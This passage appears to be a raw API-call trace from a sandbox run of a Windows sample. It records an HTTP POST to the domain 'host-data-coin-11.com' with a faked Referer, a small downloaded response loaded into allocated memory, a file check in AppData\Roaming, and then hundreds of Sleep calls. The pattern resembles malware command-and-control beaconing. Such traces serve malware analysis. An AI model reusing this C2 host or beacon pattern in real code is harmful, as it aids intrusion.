pProxyConfig=0xfc4fae8 | out: pProxyConfig=0xfc4fae8) returned 1 [0172.338] WinHttpOpen (pszAgentW="Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x83423f0 [0172.339] WinHttpCrackUrl (in: pwszUrl="http://host-data-coin-11.com/", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0xfc4fba0 | out: lpUrlComponents=0xfc4fba0) returned 1 [0172.339] WinHttpConnect (hSession=0x83423f0, pswzServerName="host-data-coin-11.com", nServerPort=0x50, dwReserved=0x0) returned 0x84fc040 [0172.339] RtlAllocateHeap (HeapHandle=0x9210000, Flags=0x8, Size=0x12) returned 0x92107f0 [0172.339] RtlAllocateHeap (HeapHandle=0x9210000, Flags=0x8, Size=0x68) returned 0x92161d0 [0172.339] WinHttpOpenRequest (hConnect=0x84fc040, pwszVerb="POST", pwszObjectName="/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x0) returned 0x4a18280 [0172.339] RtlAllocateHeap (HeapHandle=0x9210000, Flags=0x8, Size=0x4e) returned 0x9216240 [0172.339] RtlAllocateHeap (HeapHandle=0x9210000, Flags=0x8, Size=0x10d) returned 0x92162a0 [0172.339] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xc13ca06c [0172.339] RtlAllocateHeap (HeapHandle=0x9210000, Flags=0x8, Size=0x12) returned 0x9210810 [0172.339] RtlAllocateHeap (HeapHandle=0x9210000, Flags=0x8, Size=0x17) returned 0x92163c0 [0172.339] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xcef89f76 [0172.339] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x4a96d9c [0172.339] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xac53f8ee [0172.339] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x7d461a87 [0172.339] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x8f72468f [0172.340] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x804954c3 [0172.340] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x52e64aed [0172.340] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x7d60ebe3 [0172.340] wsprintfW (in: param_1=0x92162a0, param_2="Accept: */*\r\nReferer: http://%S%s/" | out: param_1="Accept: */*\r\nReferer: http://iqlfaxs.net/") returned 41 [0172.340] RtlSizeHeap (HeapHandle=0x9210000, Flags=0x0, MemoryPointer=0x92163c0) returned 0x17 [0172.340] RtlFreeHeap (HeapHandle=0x9210000, Flags=0x0, BaseAddress=0x92163c0) returned 1 [0172.340] RtlSizeHeap (HeapHandle=0x9210000, Flags=0x0, MemoryPointer=0x9210810) returned 0x12 [0172.340] RtlFreeHeap (HeapHandle=0x9210000, Flags=0x0, BaseAddress=0x9210810) returned 1 [0172.340] RtlSizeHeap (HeapHandle=0x9210000, Flags=0x0, MemoryPointer=0x9216240) returned 0x4e [0172.341] RtlFreeHeap (HeapHandle=0x9210000, Flags=0x0, BaseAddress=0x9216240) returned 1 [0172.341] WinHttpAddRequestHeaders (hRequest=0x4a18280, pwszHeaders="Accept: */*\r\nReferer: http://iqlfaxs.net/", dwHeadersLength=0xffffffff, dwModifiers=0x20000000) returned 1 [0172.341] WinHttpSendRequest (hRequest=0x4a18280, lpszHeaders="Content-Type: application/x-www-form-urlencoded", dwHeadersLength=0x0, lpOptional=0x9215f90*, dwOptionalLength=0x100, dwTotalLength=0x100, dwContext=0x0) returned 1 [0173.118] WinHttpReceiveResponse (hRequest=0x4a18280, lpReserved=0x0) returned 1 [0173.118] RtlAllocateHeap (HeapHandle=0x9210000, Flags=0x8, Size=0x2800) returned 0x92163c0 [0173.119] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0x92163c0, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fc58 | out: lpBuffer=0x92163c0*, lpdwNumberOfBytesRead=0xfc4fc58*=0x199) returned 1 [0173.119] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0x92163c0, Size=0x5000) returned 0x92163c0 [0173.120] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0x9216559, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fc58 | out: lpBuffer=0x9216559*, lpdwNumberOfBytesRead=0xfc4fc58*=0x0) returned 1 [0173.120] VirtualAlloc (lpAddress=0x0, dwSize=0x199, flAllocationType=0x3000, flProtect=0x4) returned 0x4d0000 [0173.122] RtlFreeHeap (HeapHandle=0x9210000, Flags=0x0, BaseAddress=0x92163c0) returned 1 [0173.123] WinHttpCloseHandle (hInternet=0x4a18280) returned 1 [0173.123] RtlSizeHeap (HeapHandle=0x9210000, Flags=0x0, MemoryPointer=0x92162a0) returned 0x10d [0173.123] RtlFreeHeap (HeapHandle=0x9210000, Flags=0x0, BaseAddress=0x92162a0) returned 1 [0173.123] WinHttpCloseHandle (hInternet=0x84fc040) returned 1 [0173.123] RtlSizeHeap (HeapHandle=0x9210000, Flags=0x0, MemoryPointer=0x92161d0) returned 0x68 [0173.124] RtlFreeHeap (HeapHandle=0x9210000, Flags=0x0, BaseAddress=0x92161d0) returned 1 [0173.125] RtlSizeHeap (HeapHandle=0x9210000, Flags=0x0, MemoryPointer=0x92107f0) returned 0x12 [0173.125] RtlFreeHeap (HeapHandle=0x9210000, Flags=0x0, BaseAddress=0x92107f0) returned 1 [0173.125] WinHttpCloseHandle (hInternet=0x83423f0) returned 1 [0173.125] RtlSizeHeap (HeapHandle=0x9210000, Flags=0x0, MemoryPointer=0x92160b0) returned 0x10c [0173.126] RtlFreeHeap (HeapHandle=0x9210000, Flags=0x0, BaseAddress=0x92160b0) returned 1 [0173.127] RtlSizeHeap (HeapHandle=0x9210000, Flags=0x0, MemoryPointer=0x9210720) returned 0xba [0173.128] RtlFreeHeap (HeapHandle=0x9210000, Flags=0x0, BaseAddress=0x9210720) returned 1 [0173.128] RtlSizeHeap (HeapHandle=0x9210000, Flags=0x0, MemoryPointer=0x9215f90) returned 0x109 [0173.128] RtlFreeHeap (HeapHandle=0x9210000, Flags=0x0, BaseAddress=0x9215f90) returned 1 [0173.128] VirtualFree (lpAddress=0x4d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0173.130] RtlSizeHeap (HeapHandle=0x9210000, Flags=0x0, MemoryPointer=0x9215d70) returned 0x210 [0173.130] RtlFreeHeap (HeapHandle=0x9210000, Flags=0x0, BaseAddress=0x9215d70) returned 1 [0173.130] RtlSizeHeap (HeapHandle=0x9210000, Flags=0x0, MemoryPointer=0x92128a0) returned 0x1008 [0173.130] RtlFreeHeap (HeapHandle=0x9210000, Flags=0x0, BaseAddress=0x92128a0) returned 1 [0173.130] RtlSizeHeap (HeapHandle=0x9210000, Flags=0x0, MemoryPointer=0x9211890) returned 0x1008 [0173.131] RtlFreeHeap (HeapHandle=0x9210000, Flags=0x0, BaseAddress=0x9211890) returned 1 [0173.131] VirtualFree (lpAddress=0x460000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0173.133] VirtualFree (lpAddress=0x470000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0173.134] RtlSizeHeap (HeapHandle=0x9210000, Flags=0x0, MemoryPointer=0x9211840) returned 0x26 [0173.135] RtlFreeHeap (HeapHandle=0x9210000, Flags=0x0, BaseAddress=0x9211840) returned 1 [0173.135] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\wvhwbfa" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\wvhwbfa"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0173.135] Sleep (dwMilliseconds=0x258) [0173.736] Sleep (dwMilliseconds=0x258) [0174.336] Sleep (dwMilliseconds=0x258) [0174.937] Sleep (dwMilliseconds=0x258) [0175.537] Sleep (dwMilliseconds=0x258) [0176.138] Sleep (dwMilliseconds=0x258) [0176.819] Sleep (dwMilliseconds=0x258) [0177.420] Sleep (dwMilliseconds=0x258) [0178.033] Sleep (dwMilliseconds=0x258) [0178.633] Sleep (dwMilliseconds=0x258) [0179.273] Sleep (dwMilliseconds=0x258) [0179.874] Sleep (dwMilliseconds=0x258) [0180.474] Sleep (dwMilliseconds=0x258) [0181.075] Sleep (dwMilliseconds=0x258) [0181.675] Sleep (dwMilliseconds=0x258) [0182.276] Sleep (dwMilliseconds=0x258) [0182.962] Sleep (dwMilliseconds=0x258) [0183.563] Sleep (dwMilliseconds=0x258) [0183.568] Sleep (dwMilliseconds=0x258) [0183.569] Sleep (dwMilliseconds=0x258) [0183.570] Sleep (dwMilliseconds=0x258) [0183.572] Sleep (dwMilliseconds=0x258) [0183.573] Sleep (dwMilliseconds=0x258) [0183.575] Sleep (dwMilliseconds=0x258) [0183.576] Sleep (dwMilliseconds=0x258) [0183.578] Sleep (dwMilliseconds=0x258) [0183.579] Sleep (dwMilliseconds=0x258) [0183.581] Sleep (dwMilliseconds=0x258) [0183.582] Sleep (dwMilliseconds=0x258) [0183.584] Sleep (dwMilliseconds=0x258) [0183.585] Sleep (dwMilliseconds=0x258) [0183.587] Sleep (dwMilliseconds=0x258) [0183.589] Sleep (dwMilliseconds=0x258) [0183.590] Sleep (dwMilliseconds=0x258) [0183.591] Sleep (dwMilliseconds=0x258) [0183.593] Sleep (dwMilliseconds=0x258) [0183.594] Sleep (dwMilliseconds=0x258) [0183.598] Sleep (dwMilliseconds=0x258) [0183.599] Sleep (dwMilliseconds=0x258) [0183.601] Sleep (dwMilliseconds=0x258) [0183.602] Sleep (dwMilliseconds=0x258) [0183.604] Sleep (dwMilliseconds=0x258) [0183.605] Sleep (dwMilliseconds=0x258) [0183.607] Sleep (dwMilliseconds=0x258) [0183.608] Sleep (dwMilliseconds=0x258) [0183.610] Sleep (dwMilliseconds=0x258) [0183.611] Sleep (dwMilliseconds=0x258) [0183.613] Sleep (dwMilliseconds=0x258) [0183.614] Sleep (dwMilliseconds=0x258) [0183.616] Sleep (dwMilliseconds=0x258) [0183.617] Sleep (dwMilliseconds=0x258) [0183.619] Sleep (dwMilliseconds=0x258) [0183.620] Sleep (dwMilliseconds=0x258) [0183.661] Sleep (dwMilliseconds=0x258) [0183.663] Sleep (dwMilliseconds=0x258) [0183.667] Sleep (dwMilliseconds=0x258) [0183.668] Sleep (dwMilliseconds=0x258) [0183.670] Sleep (dwMilliseconds=0x258) [0183.672] Sleep (dwMilliseconds=0x258) [0183.673] Sleep (dwMilliseconds=0x258) [0183.675] Sleep (dwMilliseconds=0x258) [0183.676] Sleep (dwMilliseconds=0x258) [0183.678] Sleep (dwMilliseconds=0x258) [0183.679] Sleep (dwMilliseconds=0x258) [0183.681] Sleep (dwMilliseconds=0x258) [0183.682] Sleep (dwMilliseconds=0x258) [0183.684] Sleep (dwMilliseconds=0x258) [0183.685] Sleep (dwMilliseconds=0x258) [0183.687] Sleep (dwMilliseconds=0x258) [0183.688] Sleep (dwMilliseconds=0x258) [0183.690] Sleep (dwMilliseconds=0x258) [0183.691] Sleep (dwMilliseconds=0x258) [0183.693] Sleep (dwMilliseconds=0x258) [0183.694] Sleep (dwMilliseconds=0x258) [0183.696] Sleep (dwMilliseconds=0x258) [0183.697] Sleep (dwMilliseconds=0x258) [0183.700] Sleep (dwMilliseconds=0x258) [0183.701] Sleep (dwMilliseconds=0x258) [0183.703] Sleep (dwMilliseconds=0x258) [0183.704] Sleep (dwMilliseconds=0x258) [0183.706] Sleep (dwMilliseconds=0x258) [0183.707] Sleep (dwMilliseconds=0x258) [0183.709] Sleep (dwMilliseconds=0x258) [0183.710] Sleep (dwMilliseconds=0x258) [0183.712] Sleep (dwMilliseconds=0x258) [0183.713] Sleep (dwMilliseconds=0x258) [0183.715] Sleep (dwMilliseconds=0x258) [0183.716] Sleep (dwMilliseconds=0x258) [0183.718] Sleep (dwMilliseconds=0x258) [0183.719] Sleep (dwMilliseconds=0x258) [0183.721] Sleep (dwMilliseconds=0x258) [0183.722] Sleep (dwMilliseconds=0x258) [0183.724] Sleep (dwMilliseconds=0x258) [0183.725] Sleep (dwMilliseconds=0x258) [0183.727] Sleep (dwMilliseconds=0x258) [0183.728] Sleep (dwMilliseconds=0x258) [0183.730] Sleep (dwMilliseconds=0x258) [0183.732] Sleep (dwMilliseconds=0x258) [0183.733] Sleep (dwMilliseconds=0x258) [0183.737] Sleep (dwMilliseconds=0x258) [0183.738] Sleep (dwMilliseconds=0x258) [0183.740] Sleep (dwMilliseconds=0x258) [0183.741] Sleep (dwMilliseconds=0x258) [0183.743] Sleep (dwMilliseconds=0x258) [0183.744] Sleep (dwMilliseconds=0x258) [0183.745] Sleep (dwMilliseconds=0x258) [0183.747] Sleep (dwMilliseconds=0x258) [0183.748] Sleep (dwMilliseconds=0x258) [0183.762] Sleep (dwMilliseconds=0x258) [0183.763] Sleep (dwMilliseconds=0x258) [0183.764] Sleep (dwMilliseconds=0x258) [0183.767] Sleep (dwMilliseconds=0x258) [0183.769] Sleep (dwMilliseconds=0x258) [0183.770] Sleep (dwMilliseconds=0x258) [0183.773] Sleep (dwMilliseconds=0x258) [0183.774] Sleep (dwMilliseconds=0x258) [0183.776] Sleep (dwMilliseconds=0x258) [0183.777] Sleep (dwMilliseconds=0x258) [0183.779] Sleep (dwMilliseconds=0x258) [0183.780] Sleep (dwMilliseconds=0x258) [0183.782] Sleep (dwMilliseconds=0x258) [0183.783] Sleep (dwMilliseconds=0x258) [0183.785] Sleep (dwMilliseconds=0x258) [0183.786] Sleep (dwMilliseconds=0x258) [0183.788] Sleep (dwMilliseconds=0x258) [0183.789] Sleep (dwMilliseconds=0x258) [0183.791] Sleep (dwMilliseconds=0x258) [0183.792] Sleep (dwMilliseconds=0x258) [0183.794] Sleep (dwMilliseconds=0x258) [0183.795] Sleep (dwMilliseconds=0x258) [0183.797] Sleep (dwMilliseconds=0x258) [0183.799] Sleep (dwMilliseconds=0x258) [0183.888] Sleep (dwMilliseconds=0x258) [0183.890] Sleep (dwMilliseconds=0x258) [0183.893] Sleep (dwMilliseconds=0x258) [0183.894] Sleep (dwMilliseconds=0x258) [0183.896] Sleep (dwMilliseconds=0x258) [0183.897] Sleep (dwMilliseconds=0x258) [0183.900] Sleep (dwMilliseconds=0x258) [0183.901] Sleep (dwMilliseconds=0x258) [0183.903] Sleep (dwMilliseconds=0x258) [0183.904] Sleep (dwMilliseconds=0x258) [0183.906] Sleep (dwMilliseconds=0x258) [0183.907] Sleep (dwMilliseconds=0x258) [0183.909] Sleep (dwMilliseconds=0x258) [0183.911] Sleep (dwMilliseconds=0x258) [0183.913] Sleep (dwMilliseconds=0x258) [0183.914] Sleep (dwMilliseconds=0x258) [0183.916] Sleep (dwMilliseconds=0x258) [0183.918] Sleep (dwMilliseconds=0x258) [0183.919] Sleep (dwMilliseconds=0x258) [0183.921] Sleep (dwMilliseconds=0x258) [0183.922] Sleep (dwMilliseconds=0x258) [0183.924] Sleep (dwMilliseconds=0x258) [0183.925] Sleep (dwMilliseconds=0x258) [0183.927] Sleep (dwMilliseconds=0x258) [0183.928] Sleep (dwMilliseconds=0x258) [0183.931] Sleep (dwMilliseconds=0x258) [0183.933] Sleep (dwMilliseconds=0x258) [0183.935] Sleep (dwMilliseconds=0x258) [0183.936] Sleep (dwMilliseconds=0x258) [0183.938] Sleep (dwMilliseconds=0x258) [0183.939] Sleep (dwMilliseconds=0x258) [0183.941] Sleep (dwMilliseconds=0x258) [0183.942] Sleep (dwMilliseconds=0x258) [0183.944] Sleep (dwMilliseconds=0x258) [0183.945] Sleep (dwMilliseconds=0x258) [0183.947] Sleep (dwMilliseconds=0x258) [0183.949] Sleep (dwMilliseconds=0x258) [0183.953] Sleep (dwMilliseconds=0x258) [0183.954] Sleep (dwMilliseconds=0x258) [0183.956] Sleep (dwMilliseconds=0x258) [0183.958] Sleep (dwMilliseconds=0x258) [0183.959] Sleep (dwMilliseconds=0x258) [0183.961] Sleep (dwMilliseconds=0x258) [0183.962] Sleep (dwMilliseconds=0x258) [0183.964] Sleep (dwMilliseconds=0x258) [0183.966] Sleep (dwMilliseconds=0x258) [0183.967] Sleep (dwMilliseconds=0x258) [0183.969] Sleep (dwMilliseconds=0x258) [0183.970] Sleep (dwMilliseconds=0x258) [0183.974] Sleep (dwMilliseconds=0x258) [0183.975] Sleep (dwMilliseconds=0x258) [0183.978] Sleep (dwMilliseconds=0x258) [0183.979] Sleep (dwMilliseconds=0x258) [0183.981] Sleep (dwMilliseconds=0x258) [0183.982] Sleep (dwMilliseconds=0x258) [0183.984] Sleep (dwMilliseconds=0x258) [0183.987] Sleep (dwMilliseconds=0x258) [0183.988] Sleep (dwMilliseconds=0x258) [0183.990] Sleep (dwMilliseconds=0x258) [0183.992] Sleep (dwMilliseconds=0x258) [0183.993] Sleep (dwMilliseconds=0x258) [0183.995] Sleep (dwMilliseconds=0x258) [0183.996] Sleep (dwMilliseconds=0x258) [0183.998] Sleep (dwMilliseconds=0x258) [0183.999] Sleep (dwMilliseconds=0x258) [0184.001] Sleep (dwMilliseconds=0x258) [0184.002] Sleep (dwMilliseconds=0x258) [0184.004] Sleep (dwMilliseconds=0x258) [0184.005] Sleep (dwMilliseconds=0x258) [0184.007] Sleep (dwMilliseconds=0x258) [0184.008] Sleep (dwMilliseconds=0x258) [0184.010] Sleep (dwMilliseconds=0x258) [0184.011] Sleep (dwMilliseconds=0x258) [0184.013] Sleep (dwMilliseconds=0x258) [0184.014] Sleep (dwMilliseconds=0x258) [0184.018] Sleep (dwMilliseconds=0x258) [0184.019] Sleep (dwMilliseconds=0x258) [0184.021] Sleep (dwMilliseconds=0x258) [0184.022] Sleep (dwMilliseconds=0x258) [0184.024] Sleep (dwMilliseconds=0x258) [0184.025] Sleep (dwMilliseconds=0x258) [0184.026] Sleep (dwMilliseconds=0x258) [0184.028] Sleep (dwMilliseconds=0x258) [0184.029] Sleep (dwMilliseconds=0x258) [0184.031] Sleep (dwMilliseconds=0x258) [0184.032] Sleep (dwMilliseconds=0x258) [0184.034] Sleep (dwMilliseconds=0x258) [0184.035] Sleep (dwMilliseconds=0x258) [0184.037] Sleep (dwMilliseconds=0x258) [0184.038] Sleep (dwMilliseconds=0x258) [0184.040] Sleep (dwMilliseconds=0x258) [0184.041] Sleep (dwMilliseconds=0x258) [0184.043] Sleep (dwMilliseconds=0x258) [0184.045] Sleep (dwMilliseconds=0x258) [0184.047] Sleep (dwMilliseconds=0x258) [0184.049] Sleep (dwMilliseconds=0x258) [0184.055] Sleep (dwMilliseconds=0x258) [0184.056] Sleep (dwMilliseconds=0x258) [0184.058] Sleep (dwMilliseconds=0x258) [0184.059] Sleep (dwMilliseconds=0x258) [0184.061] Sleep (dwMilliseconds=0x258) [0184.063] Sleep (dwMilliseconds=0x258) [0184.065] Sleep (dwMilliseconds=0x258) [0184.066] Sleep (dwMilliseconds=0x258) [0184.068] Sleep (dwMilliseconds=0x258) [0184.070] Sleep (dwMilliseconds=0x258) [0184.071] Sleep (dwMilliseconds=0x258) [0184.073] Sleep (dwMilliseconds=0x258) [0184.075] Sleep (dwMilliseconds=0x258) [0184.077] Sleep (dwMilliseconds=0x258) [0184.078] Sleep (dwMilliseconds=0x258) [0184.080] Sleep (dwMilliseconds=0x258) [0184.081] Sleep (dwMilliseconds=0x258) [0184.083] Sleep (dwMilliseconds=0x258) [0184.084] Sleep (dwMilliseconds=0x258) [0184.087] Sleep (dwMilliseconds=0x258) [0184.088] Sleep (dwMilliseconds=0x258) [0184.090] Sleep (dwMilliseconds=0x258) [0184.091] Sleep (dwMilliseconds=0x258) [0184.093] Sleep (dwMilliseconds=0x258) [0184.094] Sleep (dwMilliseconds=0x258) [0184.096] Sleep (dwMilliseconds=0x258) [0184.098] Sleep (dwMilliseconds=0x258) [0184.100] Sleep (dwMilliseconds=0x258) [0184.102] Sleep (dwMilliseconds=0x258) [0184.103] Sleep (dwMilliseconds=0x258) [0184.105] Sleep (dwMilliseconds=0x258) [0184.106] Sleep (dwMilliseconds=0x258) [0184.108] Sleep (dwMilliseconds=0x258) [0184.109] Sleep (dwMilliseconds=0x258) [0184.111] Sleep (dwMilliseconds=0x258) [0184.112] Sleep (dwMilliseconds=0x258) [0184.114] Sleep (dwMilliseconds=0x258) [0184.774] Sleep (dwMilliseconds=0x258) [0184.776] Sleep (dwMilliseconds=0x258) [0184.777] Sleep (dwMilliseconds=0x258) [0184.778] Sleep (dwMilliseconds=0x258) [0184.780] Sleep (dwMilliseconds=0x258) [0184.782] Sleep (dwMilliseconds=0x258) [0184.783] Sleep (dwMilliseconds=0x258) [0184.785] Sleep (dwMilliseconds=0x258) [0184.787] Sleep (dwMilliseconds=0x258) [0184.788] Sleep (dwMilliseconds=0x258) [0184.790] Sleep (dwMilliseconds=0x258) [0184.807] Sleep (dwMilliseconds=0x258) [0184.808] Sleep (dwMilliseconds=0x258) [0184.810] Sleep (dwMilliseconds=0x258) [0184.811] Sleep (dwMilliseconds=0x258) [0184.813] Sleep (dwMilliseconds=0x258) [0184.815] Sleep (dwMilliseconds=0x258) [0184.817] Sleep (dwMilliseconds=0x258) [0184.818] Sleep (dwMilliseconds=0x258) [0184.820] Sleep (dwMilliseconds=0x258) [0184.821] Sleep (dwMilliseconds=0x258) [0184.823] Sleep (dwMilliseconds=0x258) [0184.824] Sleep (dwMilliseconds=0x258) [0184.826] Sleep (dwMilliseconds=0x258) [0184.827] Sleep (dwMilliseconds=0x258) [0184.829] Sleep (dwMilliseconds=0x258) [0184.830] Sleep (dwMilliseconds=0x258) [0184.832] Sleep (dwMilliseconds=0x258) [0184.834] Sleep (dwMilliseconds=0x258) [0184.835] Sleep (dwMilliseconds=0x258) [0184.837] Sleep (dwMilliseconds=0x258) [0184.839] Sleep (dwMilliseconds=0x258) [0184.840] Sleep (dwMilliseconds=0x258) [0184.842] Sleep (dwMilliseconds=0x258) [0184.845] Sleep (dwMilliseconds=0x258) [0184.847] Sleep (dwMilliseconds=0x258) [0184.849] Sleep (dwMilliseconds=0x258) [0184.850] Sleep (dwMilliseconds=0x258) [0184.852] Sleep (dwMilliseconds=0x258) [0184.854] Sleep (dwMilliseconds=0x258) [0184.856] Sleep (dwMilliseconds=0x258) [0184.858] Sleep (dwMilliseconds=0x258) [0184.859] Sleep (dwMilliseconds=0x258) [0184.862] Sleep (dwMilliseconds=0x258) [0184.863] Sleep (dwMilliseconds=0x258) [0184.865] Sleep (dwMilliseconds=0x258) [0184.867] Sleep (dwMilliseconds=0x258) [0184.869] Sleep (dwMilliseconds=0x258) [0184.871] Sleep (dwMilliseconds=0x258) [0184.872] Sleep (dwMilliseconds=0x258) [0184.874] Sleep (dwMilliseconds=0x258) [0184.876] Sleep (dwMilliseconds=0x258) [0184.877] Sleep (dwMilliseconds=0x258) [0184.879] Sleep (dwMilliseconds=0x258) [0184.880] Sleep (dwMilliseconds=0x258) [0184.882] Sleep (dwMilliseconds=0x258) [0184.883] Sleep (dwMilliseconds=0x258) [0184.889] Sleep (dwMilliseconds=0x258) [0184.890] Sleep (dwMilliseconds=0x258) [0184.892] Sleep (dwMilliseconds=0x258) [0184.893] Sleep (dwMilliseconds=0x258) [0184.895] Sleep (dwMilliseconds=0x258) [0184.896] Sleep (dwMilliseconds=0x258) [0184.898] Sleep (dwMilliseconds=0x258) [0184.899] Sleep (dwMilliseconds=0x258) [0184.901] Sleep (dwMilliseconds=0x258) [0184.913] Sleep (dwMilliseconds=0x258) [0184.914] Sleep (dwMilliseconds=0x258) [0184.916] Sleep (dwMilliseconds=0x258) [0184.918] Sleep (dwMilliseconds=0x258) [0184.920] Sleep (dwMilliseconds=0x258) [0184.921] Sleep (dwMilliseconds=0x258) [0184.923] Sleep (dwMilliseconds=0x258) [0184.927] Sleep (dwMilliseconds=0x258) [0184.929] Sleep (dwMilliseconds=0x258) [0184.930] Sleep (dwMilliseconds=0x258) [0184.932] Sleep (dwMilliseconds=0x258) [0184.945] Sleep (dwMilliseconds=0x258) [0184.959] Sleep (dwMilliseconds=0x258) [0184.960] Sleep (dwMilliseconds=0x258) [0184.962] Sleep (dwMilliseconds=0x258) [0184.963] Sleep (dwMilliseconds=0x258) [0184.965] Sleep (dwMilliseconds=0x258) [0184.969] Sleep (dwMilliseconds=0x258) [0184.970] Sleep (dwMilliseconds=0x258) [0184.972] Sleep (dwMilliseconds=0x258) [0184.985] Sleep (dwMilliseconds=0x258) [0184.997] Sleep (dwMilliseconds=0x258) [0185.014] Sleep (dwMilliseconds=0x258) [0185.016] Sleep (dwMilliseconds=0x258) [0185.017] Sleep (dwMilliseconds=0x258) [0185.019] Sleep (dwMilliseconds=0x258) [0185.021] Sleep (dwMilliseconds=0x258) [0185.031] Sleep (dwMilliseconds=0x258) [0185.039] Sleep (dwMilliseconds=0x258) [0185.041] Sleep (dwMilliseconds=0x258) [0185.043] Sleep (dwMilliseconds=0x258) [0185.045] Sleep (dwMilliseconds=0x258) [0185.046] Sleep (dwMilliseconds=0x258) [0185.048] Sleep (dwMilliseconds=0x258) [0185.050] Sleep (dwMilliseconds=0x258) [0185.051] Sleep (dwMilliseconds=0x258) [0185.057] Sleep (dwMilliseconds=0x258) [0185.059] Sleep (dwMilliseconds=0x258) [0185.060] Sleep (dwMilliseconds=0x258) [0185.062] Sleep (dwMilliseconds=0x258) [0185.064] Sleep (dwMilliseconds=0x258) [0185.066] Sleep (dwMilliseconds=0x258) [0185.067] Sleep (dwMilliseconds=0x258) [0185.069] Sleep (dwMilliseconds=0x258) [0185.070] Sleep (dwMilliseconds=0x258) [0185.072] Sleep (dwMilliseconds=0x258) [0185.073] Sleep (dwMilliseconds=0x258) [0185.075] Sleep (dwMilliseconds=0x258) [0185.077] Sleep (dwMilliseconds=0x258) [0185.078] Sleep (dwMilliseconds=0x258) [0185.079] Sleep (dwMilliseconds=0x258) [0185.081] Sleep (dwMilliseconds=0x258) [0185.082] Sleep (dwMilliseconds=0x258) [0185.084] Sleep (dwMilliseconds=0x258) [0185.085] Sleep (dwMilliseconds=0x258) [0185.087] Sleep (dwMilliseconds=0x258) [0185.089] Sleep (dwMilliseconds=0x258) [0185.090] Sleep (dwMilliseconds=0x258) [0185.092] Sleep (dwMilliseconds=0x258) [0185.093] Sleep (dwMilliseconds=0x258) [0185.095] Sleep (dwMilliseconds=0x258) [0185.096] Sleep (dwMilliseconds=0x258) [0185.098] Sleep (dwMilliseconds=0x258) [0185.099] Sleep (dwMilliseconds=0x258) [0185.101] Sleep (dwMilliseconds=0x258) [0185.102] Sleep (dwMilliseconds=0x258) [0185.104] Sleep (dwMilliseconds=0x258) [0185.105] Sleep (dwMilliseconds=0x258) [0185.107] Sleep (dwMilliseconds=0x258) [0185.109] Sleep (dwMilliseconds=0x258) [0185.111] Sleep (dwMilliseconds=0x258) [0185.112] Sleep (dwMilliseconds=0x258) [0185.114] Sleep (dwMilliseconds=0x258) [0185.115] Sleep (dwMilliseconds=0x258) [0185.117] Sleep (dwMilliseconds=0x258) [0185.119] Sleep (dwMilliseconds=0x258) [0185.120] Sleep (dwMilliseconds=0x258) [0185.122] Sleep (dwMilliseconds=0x258) [0185.123] Sleep (dwMilliseconds=0x258) [0185.125] Sleep (dwMilliseconds=0x258) [0185.127] Sleep (dwMilliseconds=0x258) [0185.128] Sleep (dwMilliseconds=0x258) [0185.131] Sleep (dwMilliseconds=0x258) [0185.132] Sleep (dwMilliseconds=0x258) [0185.134] Sleep (dwMilliseconds=0x258) [0185.135] Sleep (dwMilliseconds=0x258) [0185.136] Sleep (dwMilliseconds=0x258) [0185.145] Sleep (dwMilliseconds=0x258) [0185.155] Sleep (dwMilliseconds=0x258) [0185.156] Sleep (dwMilliseconds=0x258) [0185.159] Sleep (dwMilliseconds=0x258) [0185.160] Sleep (dwMilliseconds=0x258) [0185.163] Sleep (dwMilliseconds=0x258) [0185.164] Sleep (dwMilliseconds=0x258) [0185.166] Sleep (dwMilliseconds=0x258) [0185.174] Sleep (dwMilliseconds=0x258) [0185.183] Sleep (dwMilliseconds=0x258) [0185.192] Sleep (dwMilliseconds=0x258) [0185.224] Sleep (dwMilliseconds=0x258) [0185.229] Sleep (dwMilliseconds=0x258) [0185.232] Sleep (dwMilliseconds=0x258) [0185.236] Sleep (dwMilliseconds=0x258) [0185.239] Sleep (dwMilliseconds=0x258) [0185.240] Sleep (dwMilliseconds=0x258) [0185.241] Sleep (dwMilliseconds=0x258) [0185.243] Sleep (dwMilliseconds=0x258) [0185.244] Sleep (dwMilliseconds=0x258) [0185.245] Sleep (dwMilliseconds=0x258) [0185.247] Sleep (dwMilliseconds=0x258) [0185.249] Sleep (dwMilliseconds=0x258) [0185.252] Sleep (dwMilliseconds=0x258) [0185.261] Sleep (dwMilliseconds=0x258) [0185.263] Sleep (dwMilliseconds=0x258) [0185.264] Sleep (dwMilliseconds=0x258) [0185.266] Sleep (dwMilliseconds=0x258) [0185.268] Sleep (dwMilliseconds=0x258) [0185.270] Sleep (dwMilliseconds=0x258) [0185.272] Sleep (dwMilliseconds=0x258) [0185.274] Sleep (dwMilliseconds=0x258) [0185.275] Sleep (dwMilliseconds=0x258) [0185.277] Sleep (dwMilliseconds=0x258) [0185.278] Sleep (dwMilliseconds=0x258) [0185.280] Sleep (dwMilliseconds=0x258) [0185.281] Sleep (dwMilliseconds=0x258) [0185.283] Sleep 